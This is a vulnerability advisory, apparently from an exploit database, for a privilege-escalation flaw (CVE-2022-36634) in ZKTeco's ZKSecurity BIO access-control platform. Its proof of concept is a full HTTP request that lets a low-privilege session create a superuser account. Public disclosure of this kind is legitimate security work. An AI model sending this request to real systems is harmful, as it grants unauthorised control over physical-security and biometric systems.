ZKSecurity BIO 3.0.5.0_R Privilege Escalation

2022.10.04
Credit: Silton Santos
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-264

#######################ADVISORY INFORMATION####################### Product: ZKSecurity BIO Vendor: ZKTeco Version Affected: 3.0.5.0_R CVE: CVE-2022-36634 Vulnerability: User privilege escalation #######################CREDIT####################### This vulnerability was discovered and researched by Caio Burgardt and Silton Santos. #######################INTRODUCTION####################### Based on the hybrid biometric technology and computer vision technology, ZKBioSecurity provides a comprehensive web-based security platform. It contains multiple integrated modules: personnel, time & attendance, access control, visitor management, offline & online consumption management, guard patrol, parking, elevator control, entrance control, Facekiosk, intelligent video management, mask and temperature detection module, and other smart sub-systems. #######################VULNERABILITY DETAILS####################### The application's access control management does not check the session's permissions correctly. An attacker with "Person Self-Login" or "User" privilege can create a super user with full privileges in the application #######################PROOF OF CONCEPT####################### POST /authUserAction!edit.action HTTP/1.1 Host: {HOST} User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------291763244192371568695079347 Content-Length: 1956 Origin: http://{HOST}:8088 Connection: close Referer: http://{HOST}:8088/base_index.action Cookie: <INSERT_LOW-PRIVILEGE_COOKIE_HERE> Upgrade-Insecure-Requests: 1 -----------------------------291763244192371568695079347 Content-Disposition: form-data; name="authUser.username" test_privesc -----------------------------291763244192371568695079347 Content-Disposition: form-data; name="authUser.loginPwd" KDla123 -----------------------------291763244192371568695079347 Content-Disposition: form-data; name="repassword" KDla123 -----------------------------291763244192371568695079347 Content-Disposition: form-data; name="authUser.isActive" true -----------------------------291763244192371568695079347 Content-Disposition: form-data; name="authUser.isSuperuser" true -----------------------------291763244192371568695079347 Content-Disposition: form-data; name="groupIds" -----------------------------291763244192371568695079347 Content-Disposition: form-data; name="deptIds" -----------------------------291763244192371568695079347 Content-Disposition: form-data; name="areaIds" -----------------------------291763244192371568695079347 Content-Disposition: form-data; name="authUser.email" -----------------------------291763244192371568695079347 Content-Disposition: form-data; name="authUser.name" -----------------------------291763244192371568695079347 Content-Disposition: form-data; name="authUser.lastName" -----------------------------291763244192371568695079347 Content-Disposition: form-data; name="fingerTemplate" -----------------------------291763244192371568695079347 Content-Disposition: form-data; name="fingerId" -----------------------------291763244192371568695079347 Content-Disposition: form-data; name="logMethod" add -----------------------------291763244192371568695079347 Content-Disposition: form-data; name="un" 1657813612925_286 -----------------------------291763244192371568695079347 Content-Disposition: form-data; name="systemCode" base -----------------------------291763244192371568695079347-- #######################END#######################


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top